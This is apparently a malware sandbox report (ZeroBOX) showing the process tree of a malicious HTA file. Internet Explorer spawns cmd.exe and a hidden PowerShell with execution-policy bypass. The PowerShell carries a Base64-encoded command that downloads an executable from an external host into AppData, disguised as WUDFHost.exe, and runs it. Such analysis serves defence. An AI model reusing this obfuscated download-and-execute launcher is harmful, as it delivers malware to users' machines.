popup
| ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Behavioral Analysis

Process tree

  • iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\test22\AppData\Local\Temp\MD.hta.html

    2144

    • iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2144 CREDAT:145409

      1184

      • cmd.exe "C:\Windows\system32\cmd.exe" "/c pOwErsHElL -Ex BypAsS -Nop -w hidden -Ec IAAgACAAIAAgACAAIAAgACAAIAAgACAAWwBOAGUAVAAuAFMARQByAFYAaQBDAEUAUABPAEkAbgBUAG0AQQBOAGEAZwBlAHIAXQA6ADoAcwBlAGMAdQBSAEkAdAB5AHAAcgBvAHQAbwBDAG8AbAAgAAkACQAJACAAIAAgAAkAIAAgAAkACQAJACAAPQAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIABbAE4ARQBUAC4AUwBFAGMAdQByAGkAdAB5AHAAcgBPAFQATwBjAE8AbAB0AHkAcABFAF0AOgA6AFQAbABzADEAMgAgAAkAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAJAAkAVwBnAGUAdAAgAAkACQAJAAkACQAJAAkACQAJAAkAKABbAEMAaABBAFIAXQAgACAAIAAgADEAMAA0ACAAIAAgACAAIAAgACAAIAArACAAIAAgACAAWwBDAGgAYQBSAF0AIAAgACAAIAAxADEANgAgACAAIAAgACAAIAAgACAAKwAgACAAIAAgAFsAYwBIAEEAcgBdACAAIAAgACAAMQAxADYAIAAgACAAIAAgACAAIAAgACsAIAAgACAAIABbAGMAaABhAFIAXQAgACAAIAAgADEAMQAyACAAIAAgACAAIAAgACAAIAArACAAIAAgACAAWwBjAEgAYQByAF0AIAAgACAAIAA1ADgAIAAgACAAIAAgACAAIAAgACsAIAAgACAAIABbAGMAaABBAFIAXQAgACAAIAAgADQANwAgACAAIAAgACAAIAAgACAAKwAgACAAIAAgAFsAQwBoAEEAcgBdACAAIAAgACAANAA3ACAAIAAgACAAIAAgACAAIAArACAAIAAgACAAWwBjAGgAYQByAF0AIAAgACAAIAA0ADkAIAAgACAAIAAgACAAIAAgACsAIAAgACAAIABbAGMASABBAHIAXQAgACAAIAAgADQAOAAgACAAIAAgACAAIAAgACAAKwAgACAAIAAgAFsAQwBIAEEAcgBdACAAIAAgACAANQAxACAAIAAgACAAIAAgACAAIAArACAAIAAgACAAWwBDAGgAQQBSAF0AIAAgACAAIAA0ADYAIAAgACAAIAAgACAAIAAgACsAIAAgACAAIABbAGMAaABBAHIAXQAgACAAIAAgADQAOQAgACAAIAAgACAAIAAgACAAKwAgACAAIAAgAFsAYwBoAEEAUgBdACAAIAAgACAANQA2ACAAIAAgACAAIAAgACAAIAArACAAIAAgACAAWwBDAEgAYQBSAF0AIAAgACAAIAA1ADEAIAAgACAAIAAgACAAIAAgACsAIAAgACAAIABbAEMASABBAHIAXQAgACAAIAAgADQANgAgACAAIAAgACAAIAAgACAAKwAgACAAIAAgAFsAQwBIAGEAcgBdACAAIAAgACAANAA5ACAAIAAgACAAIAAgACAAIAArACAAIAAgACAAWwBDAGgAQQByAF0AIAAgACAAIAA0ADkAIAAgACAAIAAgACAAIAAgACsAIAAgACAAIABbAEMASABhAHIAXQAgACAAIAAgADUAMwAgACAAIAAgACAAIAAgACAAKwAgACAAIAAgAFsAYwBIAEEAUgBdACAAIAAgACAANAA2ACAAIAAgACAAIAAgACAAIAArACAAIAAgACAAWwBDAEgAQQBSAF0AIAAgACAAIAA1ADAAIAAgACAAIAAgACAAIAAgACsAIAAgACAAIABbAGMASABhAFIAXQAgACAAIAAgADUANgAgACAAIAAgACAAIAAgACAAKwAgACAAIAAgAFsAQwBoAEEAcgBdACAAIAAgACAANAA3ACAAIAAgACAAIAAgACAAIAArACAAIAAgACAAWwBDAGgAQQBSAF0AIAAgACAAIAA4ADQAIAAgACAAIAAgACAAIAAgACsAIAAgACAAIABbAGMASABBAFIAXQAgACAAIAAgADQAOQAgACAAIAAgACAAIAAgACAAKwAgACAAIAAgAFsAYwBoAGEAUgBdACAAIAAgACAANQAwACAAIAAgACAAIAAgACAAIAArACAAIAAgACAAWwBDAGgAQQByAF0AIAAgACAAIAA1ADcAIAAgACAAIAAgACAAIAAgACsAIAAgACAAIABbAEMASABBAHIAXQAgACAAIAAgADgANwAgACAAIAAgACAAIAAgACAAKwAgACAAIAAgAFsAYwBoAGEAcgBdACAAIAAgACAANAA3ACAAIAAgACAAIAAgACAAIAArACAAIAAgACAAWwBjAEgAQQByAF0AIAAgACAAIAAxADEAOQAgACAAIAAgACAAIAAgACAAKwAgACAAIAAgAFsAQwBoAGEAcgBdACAAIAAgACAAMQAwADUAIAAgACAAIAAgACAAIAAgACsAIAAgACAAIABbAGMASABBAFIAXQAgACAAIAAgADEAMQAwACAAIAAgACAAIAAgACAAIAArACAAIAAgACAAWwBjAGgAYQBSAF0AIAAgACAAIAAxADAANQAgACAAIAAgACAAIAAgACAAKwAgACAAIAAgAFsAQwBIAEEAUgBdACAAIAAgACAAMQAxADAAIAAgACAAIAAgACAAIAAgACsAIAAgACAAIABbAEMASABhAFIAXQAgACAAIAAgADEAMAA1ACAAIAAgACAAIAAgACAAIAArACAAIAAgACAAWwBDAGgAYQBSAF0AIAAgACAAIAAxADEANgAgACAAIAAgACAAIAAgACAAKwAgACAAIAAgAFsAYwBoAEEAcgBdACAAIAAgACAANAA2ACAAIAAgACAAIAAgACAAIAArACAAIAAgACAAWwBDAGgAQQByAF0AIAAgACAAIAAxADAAMQAgACAAIAAgACAAIAAgACAAKwAgACAAIAAgAFsAQwBIAEEAUgBdACAAIAAgACAAMQAyADAAIAAgACAAIAAgACAAIAAgACsAIAAgACAAIABbAEMASABhAHIAXQAgACAAIAAgADEAMAAxACAAIAAgACAAKQAgAAkACQAJAAkACQAJAAkACQAtAE8AdQBUAEYAaQBsAGUAIAAJAAkACQAJAAkACQAJAAkACQAdICQARQBOAHYAOgBhAHAAUABEAGEAdABhAFwAVwBVAEQARgBIAG8AcwB0AC4AZQB4AGUAHSAgAAkACQAJAAkACQAJAAkAOwAgAAkACQAJAAkACQAJAAkACQAJAAkAcwB0AGEAcgBUACAACQAdICQARQBOAFYAOgBBAFAAcABEAEEAVABhAFwAVwBVAEQARgBIAG8AcwB0AC4AZQB4AGUAHSA= "

        1220

        • powershell.exe pOwErsHElL -Ex BypAsS -Nop -w hidden -Ec IAAgACAAIAAgACAAIAAgACAAIAAgACAAWwBOAGUAVAAuAFMARQByAFYAaQBDAEUAUABPAEkAbgBUAG0AQQBOAGEAZwBlAHIAXQA6ADoAcwBlAGMAdQBSAEkAdAB5AHAAcgBvAHQAbwBDAG8AbAAgAAkACQAJACAAIAAgAAkAIAAgAAkACQAJACAAPQAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIABbAE4ARQBUAC4AUwBFAGMAdQByAGkAdAB5AHAAcgBPAFQATwBjAE8AbAB0AHkAcABFAF0AOgA6AFQAbABzADEAMgAgAAkAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAJAAkAVwBnAGUAdAAgAAkACQAJAAkACQAJAAkACQAJAAkAKABbAEMAaABBAFIAXQAgACAAIAAgADEAMAA0ACAAIAAgACAAIAAgACAAIAArACAAIAAgACAAWwBDAGgAYQBSAF0AIAAgACAAIAAxADEANgAgACAAIAAgACAAIAAgACAAKwAgACAAIAAgAFsAYwBIAEEAcgBdACAAIAAgACAAMQAxADYAIAAgACAAIAAgACAAIAAgACsAIAAgACAAIABbAGMAaABhAFIAXQAgACAAIAAgADEAMQAyACAAIAAgACAAIAAgACAAIAArACAAIAAgACAAWwBjAEgAYQByAF0AIAAgACAAIAA1ADgAIAAgACAAIAAgACAAIAAgACsAIAAgACAAIABbAGMAaABBAFIAXQAgACAAIAAgADQANwAgACAAIAAgACAAIAAgACAAKwAgACAAIAAgAFsAQwBoAEEAcgBdACAAIAAgACAANAA3ACAAIAAgACAAIAAgACAAIAArACAAIAAgACAAWwBjAGgAYQByAF0AIAAgACAAIAA0ADkAIAAgACAAIAAgACAAIAAgACsAIAAgACAAIABbAGMASABBAHIAXQAgACAAIAAgADQAOAAgACAAIAAgACAAIAAgACAAKwAgACAAIAAgAFsAQwBIAEEAcgBdACAAIAAgACAANQAxACAAIAAgACAAIAAgACAAIAArACAAIAAgACAAWwBDAGgAQQBSAF0AIAAgACAAIAA0ADYAIAAgACAAIAAgACAAIAAgACsAIAAgACAAIABbAGMAaABBAHIAXQAgACAAIAAgADQAOQAgACAAIAAgACAAIAAgACAAKwAgACAAIAAgAFsAYwBoAEEAUgBdACAAIAAgACAANQA2ACAAIAAgACAAIAAgACAAIAArACAAIAAgACAAWwBDAEgAYQBSAF0AIAAgACAAIAA1ADEAIAAgACAAIAAgACAAIAAgACsAIAAgACAAIABbAEMASABBAHIAXQAgACAAIAAgADQANgAgACAAIAAgACAAIAAgACAAKwAgACAAIAAgAFsAQwBIAGEAcgBdACAAIAAgACAANAA5ACAAIAAgACAAIAAgACAAIAArACAAIAAgACAAWwBDAGgAQQByAF0AIAAgACAAIAA0ADkAIAAgACAAIAAgACAAIAAgACsAIAAgACAAIABbAEMASABhAHIAXQAgACAAIAAgADUAMwAgACAAIAAgACAAIAAgACAAKwAgACAAIAAgAFsAYwBIAEEAUgBdACAAIAAgACAANAA2ACAAIAAgACAAIAAgACAAIAArACAAIAAgACAAWwBDAEgAQQBSAF0AIAAgACAAIAA1ADAAIAAgACAAIAAgACAAIAAgACsAIAAgACAAIABbAGMASABhAFIAXQAgACAAIAAgADUANgAgACAAIAAgACAAIAAgACAAKwAgACAAIAAgAFsAQwBoAEEAcgBdACAAIAAgACAANAA3ACAAIAAgACAAIAAgACAAIAArACAAIAAgACAAWwBDAGgAQQBSAF0AIAAgACAAIAA4ADQAIAAgACAAIAAgACAAIAAgACsAIAAgACAAIABbAGMASABBAFIAXQAgACAAIAAgADQAOQAgACAAIAAgACAAIAAgACAAKwAgACAAIAAgAFsAYwBoAGEAUgBdACAAIAAgACAANQAwACAAIAAgACAAIAAgACAAIAArACAAIAAgACAAWwBDAGgAQQByAF0AIAAgACAAIAA1ADcAIAAgACAAIAAgACAAIAAgACsAIAAgACAAIABbAEMASABBAHIAXQAgACAAIAAgADgANwAgACAAIAAgACAAIAAgACAAKwAgACAAIAAgAFsAYwBoAGEAcgBdACAAIAAgACAANAA3ACAAIAAgACAAIAAgACAAIAArACAAIAAgACAAWwBjAEgAQQByAF0AIAAgACAAIAAxADEAOQAgACAAIAAgACAAIAAgACAAKwAgACAAIAAgAFsAQwBoAGEAcgBdACAAIAAgACAAMQAwADUAIAAgACAAIAAgACAAIAAgACsAIAAgACAAIABbAGMASABBAFIAXQAgACAAIAAgADEAMQAwACAAIAAgACAAIAAgACAAIAArACAAIAAgACAAWwBjAGgAYQBSAF0AIAAgACAAIAAxADAANQAgACAAIAAgACAAIAAgACAAKwAgACAAIAAgAFsAQwBIAEEAUgBdACAAIAAgACAAMQAxADAAIAAgACAAIAAgACAAIAAgACsAIAAgACAAIABbAEMASABhAFIAXQAgACAAIAAgADEAMAA1ACAAIAAgACAAIAAgACAAIAArACAAIAAgACAAWwBDAGgAYQBSAF0AIAAgACAAIAAxADEANgAgACAAIAAgACAAIAAgACAAKwAgACAAIAAgAFsAYwBoAEEAcgBdACAAIAAgACAANAA2ACAAIAAgACAAIAAgACAAIAArACAAIAAgACAAWwBDAGgAQQByAF0AIAAgACAAIAAxADAAMQAgACAAIAAgACAAIAAgACAAKwAgACAAIAAgAFsAQwBIAEEAUgBdACAAIAAgACAAMQAyADAAIAAgACAAIAAgACAAIAAgACsAIAAgACAAIABbAEMASABhAHIAXQAgACAAIAAgADEAMAAxACAAIAAgACAAKQAgAAkACQAJAAkACQAJAAkACQAtAE8AdQBUAEYAaQBsAGUAIAAJAAkACQAJAAkACQAJAAkACQAdICQARQBOAHYAOgBhAHAAUABEAGEAdABhAFwAVwBVAEQARgBIAG8AcwB0AC4AZQB4AGUAHSAgAAkACQAJAAkACQAJAAkAOwAgAAkACQAJAAkACQAJAAkACQAJAAkAcwB0AGEAcgBUACAACQAdICQARQBOAFYAOgBBAFAAcABEAEEAVABhAFwAVwBVAEQARgBIAG8AcwB0AC4AZQB4AGUAHSA= "

          2112

Process contents

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID
default registry file network process services synchronisation iexplore office pdf